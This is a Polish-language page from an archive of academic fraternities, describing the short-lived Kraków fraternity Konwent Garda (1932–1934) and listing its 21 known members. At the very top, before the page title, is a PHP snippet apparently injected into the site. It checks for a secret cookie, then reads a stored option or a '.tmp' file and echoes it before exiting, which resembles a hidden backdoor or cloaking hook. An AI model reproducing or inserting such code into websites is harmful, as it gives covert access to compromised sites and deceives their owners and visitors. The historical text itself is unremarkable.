if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Garda

Dekiel Gardy - vide Poszukiwania. Nazwa:
Konwent Garda – Korporacja Studentów Wyższych Uczelni Krakowa
Siedziba:
Kraków
Data powstania:
1932 r.
Barwy:
brązowa – czerwona – złota
Dewiza:
„Hardym mocny – słabym brat”

Rys historyczny

Denko dekla Jana Wojnarskiego.

Garda powstała najprawdopodobniej w 1932 r. (?). U podstaw ideowych Gardy leżały między innymi założenia o “wielkomocarstwowej racji stanu Państwa Polskiego” oraz “misji na Wschodzie”. Były one zbliżone do ideologii sanacyjnej organizacji Myśl Mocarstwowa.

Należała do korporacji sanacyjnych, a w 1932 r. została członkiem-założycielem ogólnopolskiego związku międzykorporacyjnego Federacji Polskich Korporacji Akademickich.

Wniosek o legalizację przez Senat UJ został złożony dnia 11 VI 1933 r. Władze Uniwersytetu zatwierdziły statut korporacji i wyznaczyły kuratora w osobie doc. Macieja Starzewskiego.

Bal Gardy, Kraków 1933 r.

Garda okazała się efemerydą i zakończyła działalność prawdopodobnie już w 1934 r.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 21 nazwisk.

Brak wiadomości o powojennej działalności Gardy i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Gardy obejmuje ponad 20 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Kazimierz Badeni, student prawa UJ, założyciel Gardy
 2. Napoleon Drobniak, student WF, założyciel Gardy

  Zdzisław Frydrych, 1933 r.

 3. Zdzisław Frydrych, (1914-1990) student fil. UJ, założyciel Gardy

 4. Konrad Hackbeil, student prawa UJ, założyciel Gardy, pierwszy sekretarz sem. let. 1932/33
 5. Leon Bolesław Iżycki, student prawa UJ, założyciel Gardy
 6. Jerzy Jakesch, student medycyny UJ, założyciel Gardy
 7. Jerzy Janecki, student prawa UJ, założyciel Gardy
 8. Tadeusz Jaworski, student prawa UJ, założyciel Gardy
 9. Ignacy Kleszczyński, założyciel Gardy

  Zbigniew Lenk (?), 1933 r.

 10. Zbigniew Lenk, (1911-1996) student, założyciel Gardy

 11. Ludwik Łubieński, student prawa UJ, założyciel Gardy, pierwszy prezes sem. let. 1932/33
 12. Jan Nowak, student prawa UJ, założyciel Gardy
 13. Przemysław Olszewski, student, założyciel Gardy
 14. Jerzy Osuchowski, student fil. UJ, założyciel Gardy

  Adam Piller (?), 1933 r.

 15. Adam Piller, (1913-1993) student, założyciel Gardy

 16. Jan Pomorski, student prawa UJ, założyciel Gardy
 17. Lech Przyłęcki, student prawa UJ, założyciel Gardy
 18. Edward Rulikowski, student prawa UJ, założyciel Gardy
 19. Lesław Sidor, student prawa UJ, założyciel Gardy
 20. Edward Tyszkiewicz, student prawa UJ, założyciel Gardy

  Jan Wojnarski, 1933 r.

 21. Jan Wojnarski (Woynarski), (1913-1994) student prawa UJ, założyciel Gardy

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Konwent Garda - Korporacja Studentów Wyższych Uczelni Krakowa, maszynopis,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) rozmów z rodzinami członków Korporacji Garda.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VIII 2010 r.
Ostatnia zmiana: 5 I 2011 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Konwent Garda – Korporacja Studentów Wyższych Uczelni Krakowa, (na:) www.archiwumkorporacyjne.pl, stan 5 I 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }